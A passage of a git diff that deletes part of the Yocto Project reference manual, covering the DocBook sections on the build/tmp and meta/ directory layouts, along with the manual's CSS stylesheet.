-
- <section id='structure-build-tmp-deploy-ipk'>
- <title><filename>build/tmp/deploy/ipk/</filename></title>
-
- <para>
- This directory receives <filename>.ipk</filename> packages produced by
- the build process.
- </para>
- </section>
-
- <section id='structure-build-tmp-deploy-licenses'>
- <title><filename>build/tmp/deploy/licenses/</filename></title>
-
- <para>
- This directory receives package licensing information.
- For example, the directory contains sub-directories for <filename>bash</filename>,
- <filename>busybox</filename>, and <filename>glibc</filename> (among others) that in turn
- contain appropriate <filename>COPYING</filename> license files with other licensing information.
- For information on licensing, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='structure-build-tmp-deploy-images'>
- <title><filename>build/tmp/deploy/images/</filename></title>
-
- <para>
- This directory is populated with the basic output objects of the
- build (think of them as the "generated artifacts" of the build process),
- including things like the boot loader image, kernel, root filesystem and more.
- If you want to flash the resulting image from a build onto a device,
- look here for the necessary components.
- </para>
-
- <para>
- Be careful when deleting files in this directory.
- You can safely delete old images from this directory (e.g.
- <filename>core-image-*</filename>).
- However, the kernel (<filename>*zImage*</filename>, <filename>*uImage*</filename>, etc.),
- bootloader and other supplementary files might be deployed here prior to building an
- image.
- Because these files are not directly produced from the image, if you
- delete them they will not be automatically re-created when you build the image again.
- </para>
-
- <para>
- If you do accidentally delete files here, you will need to force them to be
- re-created.
- In order to do that, you will need to know the target that produced them.
- For example, these commands rebuild and re-create the kernel files:
- <literallayout class='monospaced'>
- $ bitbake -c clean virtual/kernel
- $ bitbake virtual/kernel
- </literallayout>
- </para>
- </section>
-
- <section id='structure-build-tmp-deploy-sdk'>
- <title><filename>build/tmp/deploy/sdk/</filename></title>
-
- <para>
- The OpenEmbedded build system creates this directory to hold
- toolchain installer scripts which, when executed, install the
- sysroot that matches your target hardware.
- You can find out more about these installers in the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
- section in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- </para>
- </section>
-
- <section id='structure-build-tmp-sstate-control'>
- <title><filename>build/tmp/sstate-control/</filename></title>
-
- <para>
- The OpenEmbedded build system uses this directory for the
- shared state manifest files.
- The shared state code uses these files to record the files
- installed by each sstate task so that the files can be removed
- when cleaning the recipe or when a newer version is about to
- be installed.
- The build system also uses the manifests to detect and produce
- a warning when files from one task are overwriting those from
- another.
- </para>
- </section>
-
- <section id='structure-build-tmp-sysroots-components'>
- <title><filename>build/tmp/sysroots-components/</filename></title>
-
- <para>
- This directory is the location of the sysroot contents that the
- task
- <link linkend='ref-tasks-prepare_recipe_sysroot'><filename>do_prepare_recipe_sysroot</filename></link>
- links or copies into the recipe-specific sysroot for each
- recipe listed in
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>.
- Population of this directory is handled through shared state, while
- the path is specified by the
- <link linkend='var-COMPONENTS_DIR'><filename>COMPONENTS_DIR</filename></link>
- variable. Apart from a few unusual circumstances, handling of the
- <filename>sysroots-components</filename> directory should be
- automatic, and recipes should not directly reference
- <filename>build/tmp/sysroots-components</filename>.
- </para>
- </section>
-
- <section id='structure-build-tmp-sysroots'>
- <title><filename>build/tmp/sysroots/</filename></title>
-
- <para>
- Previous versions of the OpenEmbedded build system used to
- create a global shared sysroot per machine along with a native
- sysroot.
- Beginning with the &DISTRO; version of the Yocto Project,
- sysroots exist in recipe-specific
- <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
- directories.
- Thus, the <filename>build/tmp/sysroots/</filename> directory
- is unused.
- <note>
- The <filename>build/tmp/sysroots/</filename> directory
- can still be populated using the
- <filename>bitbake build-sysroots</filename> command and can
- be used for compatibility in some cases.
- However, in general it is not recommended to populate
- this directory.
- Individual recipe-specific sysroots should be used.
- </note>
- </para>
- </section>
-
- <section id='structure-build-tmp-stamps'>
- <title><filename>build/tmp/stamps/</filename></title>
-
- <para>
- This directory holds information that BitBake uses for
- accounting purposes to track what tasks have run and when they
- have run.
- The directory is sub-divided by architecture, package name, and
- version.
- Following is an example:
- <literallayout class='monospaced'>
- stamps/all-poky-linux/distcc-config/1.0-r0.do_build-2fdd....2do
- </literallayout>
- Although the files in the directory are empty of data,
- BitBake uses the filenames and timestamps for tracking purposes.
- </para>
-
- <para>
- For information on how BitBake uses stamp files to determine if
- a task should be rerun, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#stamp-files-and-the-rerunning-of-tasks'>Stamp Files and the Rerunning of Tasks</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- </para>
- </section>
-
- <section id='structure-build-tmp-log'>
- <title><filename>build/tmp/log/</filename></title>
-
- <para>
- This directory contains general logs that are not otherwise placed using the
- package's <filename><link linkend='var-WORKDIR'>WORKDIR</link></filename>.
- Examples of logs are the output from the
- <filename>do_check_pkg</filename> or
- <filename>do_distro_check</filename> tasks.
- Running a build does not necessarily mean this directory is created.
- </para>
- </section>
-
- <section id='structure-build-tmp-work'>
- <title><filename>build/tmp/work/</filename></title>
-
- <para>
- This directory contains architecture-specific work sub-directories
- for packages built by BitBake.
- All tasks execute from the appropriate work directory.
- For example, the source for a particular package is unpacked,
- patched, configured and compiled all within its own work directory.
- Within the work directory, organization is based on the package group
- and version for which the source is being compiled
- as defined by the
- <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>.
- </para>
-
- <para>
- It is worth considering the structure of a typical work directory.
- As an example, consider <filename>linux-yocto-kernel-3.0</filename>
- on the machine <filename>qemux86</filename>
- built within the Yocto Project.
- For this package, a work directory of
- <filename>tmp/work/qemux86-poky-linux/linux-yocto/3.0+git1+&lt;.....&gt;</filename>,
- referred to as the <filename>WORKDIR</filename>, is created.
- Within this directory, the source is unpacked to
- <filename>linux-qemux86-standard-build</filename> and then patched by Quilt.
- (See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-a-quilt-workflow'>Using Quilt in Your Workflow</ulink>"
- section in the Yocto Project Development Tasks Manual for more
- information.)
- Within the <filename>linux-qemux86-standard-build</filename> directory,
- standard Quilt directories <filename>linux-3.0/patches</filename>
- and <filename>linux-3.0/.pc</filename> are created,
- and standard Quilt commands can be used.
- </para>
-
- <para>
- There are other directories generated within <filename>WORKDIR</filename>.
- The most important directory is <filename>WORKDIR/temp/</filename>,
- which has log files for each task (<filename>log.do_*.pid</filename>)
- and contains the scripts BitBake runs for each task
- (<filename>run.do_*.pid</filename>).
- The <filename>WORKDIR/image/</filename> directory is where "make
- install" places its output that is then split into sub-packages
- within <filename>WORKDIR/packages-split/</filename>.
- </para>
- </section>
-
- <section id='structure-build-tmp-work-tunearch-recipename-version'>
- <title><filename>build/tmp/work/<replaceable>tunearch</replaceable>/<replaceable>recipename</replaceable>/<replaceable>version</replaceable>/</filename></title>
-
- <para>
- The recipe work directory - <filename>${WORKDIR}</filename>.
- </para>
-
- <para>
- As described earlier in the
- "<link linkend='structure-build-tmp-sysroots'><filename>build/tmp/sysroots/</filename></link>"
- section, beginning with the &DISTRO; release of the Yocto
- Project, the OpenEmbedded build system builds each recipe in its
- own work directory (i.e.
- <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>).
- The path to the work directory is constructed using the
- architecture of the given build (e.g.
- <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>,
- <link linkend='var-MACHINE_ARCH'><filename>MACHINE_ARCH</filename></link>,
- or "allarch"), the recipe name, and the version of the recipe (i.e.
- <link linkend='var-PE'><filename>PE</filename></link><filename>:</filename><link linkend='var-PV'><filename>PV</filename></link><filename>-</filename><link linkend='var-PR'><filename>PR</filename></link>).
- </para>
-
- <para>
- A number of key subdirectories exist within each recipe
- work directory:
- <itemizedlist>
- <listitem><para>
- <filename>${WORKDIR}/temp</filename>:
- Contains the log files of each task executed for this
- recipe, the "run" files for each executed task, which
- contain the code run, and a
- <filename>log.task_order</filename> file, which lists the
- order in which tasks were executed.
- </para></listitem>
- <listitem><para>
- <filename>${WORKDIR}/image</filename>:
- Contains the output of the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task, which corresponds to the
- <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>
- variable in that task.
- </para></listitem>
- <listitem><para>
- <filename>${WORKDIR}/pseudo</filename>:
- Contains the pseudo database and log for any tasks executed
- under pseudo for the recipe.
- </para></listitem>
- <listitem><para>
- <filename>${WORKDIR}/sysroot-destdir</filename>:
- Contains the output of the
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task.
- </para></listitem>
- <listitem><para>
- <filename>${WORKDIR}/package</filename>:
- Contains the output of the
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>
- task before the output is split into individual packages.
- </para></listitem>
- <listitem><para>
- <filename>${WORKDIR}/packages-split</filename>:
- Contains the output of the <filename>do_package</filename>
- task after the output has been split into individual
- packages.
- Subdirectories exist for each individual package created
- by the recipe.
- </para></listitem>
- <listitem><para>
- <filename>${WORKDIR}/recipe-sysroot</filename>:
- A directory populated with the target dependencies of the
- recipe.
- This directory looks like the target filesystem and
- contains libraries that the recipe might need to link
- against (e.g. the C library).
- </para></listitem>
- <listitem><para>
- <filename>${WORKDIR}/recipe-sysroot-native</filename>:
- A directory populated with the native dependencies of the
- recipe.
- This directory contains the tools the recipe needs to build
- (e.g. the compiler, Autoconf, libtool, and so forth).
- </para></listitem>
- <listitem><para>
- <filename>${WORKDIR}/build</filename>:
- This subdirectory applies only to recipes that support
- builds where the source is separate from the
- build artifacts.
- The OpenEmbedded build system uses this directory as a
- separate build directory (i.e.
- <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>).
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='structure-build-work-shared'>
- <title><filename>build/tmp/work-shared/</filename></title>
-
- <para>
- For efficiency, the OpenEmbedded build system creates and uses
- this directory to hold recipes that share a work directory with
- other recipes.
- In practice, this is only used for <filename>gcc</filename>
- and its variants (e.g. <filename>gcc-cross</filename>,
- <filename>libgcc</filename>, <filename>gcc-runtime</filename>,
- and so forth).
- </para>
- </section>
-</section>
-
-<section id='structure-meta'>
- <title>The Metadata - <filename>meta/</filename></title>
-
- <para>
- As mentioned previously,
- <link linkend='metadata'>Metadata</link> is the core
- of the Yocto Project.
- Metadata has several important subdivisions:
- </para>
-
- <section id='structure-meta-classes'>
- <title><filename>meta/classes/</filename></title>
-
- <para>
- This directory contains the <filename>*.bbclass</filename> files.
- Class files are used to abstract common code so it can be reused by multiple
- packages.
- Every package inherits the <filename>base.bbclass</filename> file.
- Examples of other important classes are <filename>autotools.bbclass</filename>, which
- in theory allows any Autotool-enabled package to work with the Yocto Project with minimal effort.
- Another example is <filename>kernel.bbclass</filename> that contains common code and functions
- for working with the Linux kernel.
- Functions like image generation or packaging also have their specific class files
- such as <filename>image.bbclass</filename>, <filename>rootfs_*.bbclass</filename> and
- <filename>package*.bbclass</filename>.
- </para>
-
- <para>
- For reference information on classes, see the
- "<link linkend='ref-classes'>Classes</link>" chapter.
- </para>
- </section>
-
- <section id='structure-meta-conf'>
- <title><filename>meta/conf/</filename></title>
-
- <para>
- This directory contains the core set of configuration files that start from
- <filename>bitbake.conf</filename> and from which all other configuration
- files are included.
- See the include statements at the end of the
- <filename>bitbake.conf</filename> file and you will note that even
- <filename>local.conf</filename> is loaded from there.
- While <filename>bitbake.conf</filename> sets up the defaults, you can often override
- these by using the (<filename>local.conf</filename>) file, machine file or
- the distribution configuration file.
- </para>
- </section>
-
- <section id='structure-meta-conf-machine'>
- <title><filename>meta/conf/machine/</filename></title>
-
- <para>
- This directory contains all the machine configuration files.
- If you set <filename>MACHINE = "qemux86"</filename>,
- the OpenEmbedded build system looks for a <filename>qemux86.conf</filename> file in this
- directory.
- The <filename>include</filename> directory contains various data common to multiple machines.
- If you want to add support for a new machine to the Yocto Project, look in this directory.
- </para>
- </section>
-
- <section id='structure-meta-conf-distro'>
- <title><filename>meta/conf/distro/</filename></title>
-
- <para>
- The contents of this directory controls any distribution-specific
- configurations.
- For the Yocto Project, the <filename>defaultsetup.conf</filename> is the main file here.
- This directory includes the versions and the
- <filename>SRCDATE</filename> definitions for applications that are configured here.
- An example of an alternative configuration might be <filename>poky-bleeding.conf</filename>.
- Although this file mainly inherits its configuration from Poky.
- </para>
- </section>
-
- <section id='structure-meta-conf-machine-sdk'>
- <title><filename>meta/conf/machine-sdk/</filename></title>
-
- <para>
- The OpenEmbedded build system searches this directory for
- configuration files that correspond to the value of
- <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>.
- By default, 32-bit and 64-bit x86 files ship with the Yocto
- Project that support some SDK hosts.
- However, it is possible to extend that support to other SDK hosts
- by adding additional configuration files in this subdirectory
- within another layer.
- </para>
- </section>
-
- <section id='structure-meta-files'>
- <title><filename>meta/files/</filename></title>
-
- <para>
- This directory contains common license files and several text files
- used by the build system.
- The text files contain minimal device information and
- lists of files and directories with known permissions.
- </para>
- </section>
-
- <section id='structure-meta-lib'>
- <title><filename>meta/lib/</filename></title>
-
- <para>
- This directory contains OpenEmbedded Python library code
- used during the build process.
- </para>
- </section>
-
- <section id='structure-meta-recipes-bsp'>
- <title><filename>meta/recipes-bsp/</filename></title>
-
- <para>
- This directory contains anything linking to specific hardware or hardware
- configuration information such as "u-boot" and "grub".
- </para>
- </section>
-
- <section id='structure-meta-recipes-connectivity'>
- <title><filename>meta/recipes-connectivity/</filename></title>
-
- <para>
- This directory contains libraries and applications related to communication with other devices.
- </para>
- </section>
-
- <section id='structure-meta-recipes-core'>
- <title><filename>meta/recipes-core/</filename></title>
-
- <para>
- This directory contains what is needed to build a basic working Linux image
- including commonly used dependencies.
- </para>
- </section>
-
- <section id='structure-meta-recipes-devtools'>
- <title><filename>meta/recipes-devtools/</filename></title>
-
- <para>
- This directory contains tools that are primarily used by the build system.
- The tools, however, can also be used on targets.
- </para>
- </section>
-
- <section id='structure-meta-recipes-extended'>
- <title><filename>meta/recipes-extended/</filename></title>
-
- <para>
- This directory contains non-essential applications that add features compared to the
- alternatives in core.
- You might need this directory for full tool functionality or for Linux Standard Base (LSB)
- compliance.
- </para>
- </section>
-
- <section id='structure-meta-recipes-gnome'>
- <title><filename>meta/recipes-gnome/</filename></title>
-
- <para>
- This directory contains all things related to the GTK+ application framework.
- </para>
- </section>
-
- <section id='structure-meta-recipes-graphics'>
- <title><filename>meta/recipes-graphics/</filename></title>
-
- <para>
- This directory contains X and other graphically related system libraries.
- </para>
- </section>
-
- <section id='structure-meta-recipes-kernel'>
- <title><filename>meta/recipes-kernel/</filename></title>
-
- <para>
- This directory contains the kernel and generic applications and libraries that
- have strong kernel dependencies.
- </para>
- </section>
-
- <section id='structure-meta-recipes-lsb4'>
- <title><filename>meta/recipes-lsb4/</filename></title>
-
- <para>
- This directory contains recipes specifically added to support
- the Linux Standard Base (LSB) version 4.x.
- </para>
- </section>
-
- <section id='structure-meta-recipes-multimedia'>
- <title><filename>meta/recipes-multimedia/</filename></title>
-
- <para>
- This directory contains codecs and support utilities for audio, images and video.
- </para>
- </section>
-
- <section id='structure-meta-recipes-rt'>
- <title><filename>meta/recipes-rt/</filename></title>
-
- <para>
- This directory contains package and image recipes for using and testing
- the <filename>PREEMPT_RT</filename> kernel.
- </para>
- </section>
-
- <section id='structure-meta-recipes-sato'>
- <title><filename>meta/recipes-sato/</filename></title>
-
- <para>
- This directory contains the Sato demo/reference UI/UX and its associated applications
- and configuration data.
- </para>
- </section>
-
- <section id='structure-meta-recipes-support'>
- <title><filename>meta/recipes-support/</filename></title>
-
- <para>
- This directory contains recipes used by other recipes, but that are
- not directly included in images (i.e. dependencies of other
- recipes).
- </para>
- </section>
-
- <section id='structure-meta-site'>
- <title><filename>meta/site/</filename></title>
-
- <para>
- This directory contains a list of cached results for various architectures.
- Because certain "autoconf" test results cannot be determined when cross-compiling due to
- the tests not able to run on a live system, the information in this directory is
- passed to "autoconf" for the various architectures.
- </para>
- </section>
-
- <section id='structure-meta-recipes-txt'>
- <title><filename>meta/recipes.txt</filename></title>
-
- <para>
- This file is a description of the contents of <filename>recipes-*</filename>.
- </para>
- </section>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-style.css b/documentation/ref-manual/ref-style.css
deleted file mode 100644
index 7077e4b70d..0000000000
--- a/documentation/ref-manual/ref-style.css
+++ /dev/null
@@ -1,1032 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/poky-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-/* Use this set when you decide to get the images in for variables.
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 0em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: 0em;
- margin-left: 15.5em;
- margin-bottom: 2em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-.glossdeffirst {
- text-indent: -70px;
-}
-*/
-
-/* Start of non-image set */
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: 0em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-.glossdeffirst {
- text-indent: 0px;
-}
-
-/* End of non-image set */
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-.writernotes {
- color: red;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-image: url("figures/poky-title.png");
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
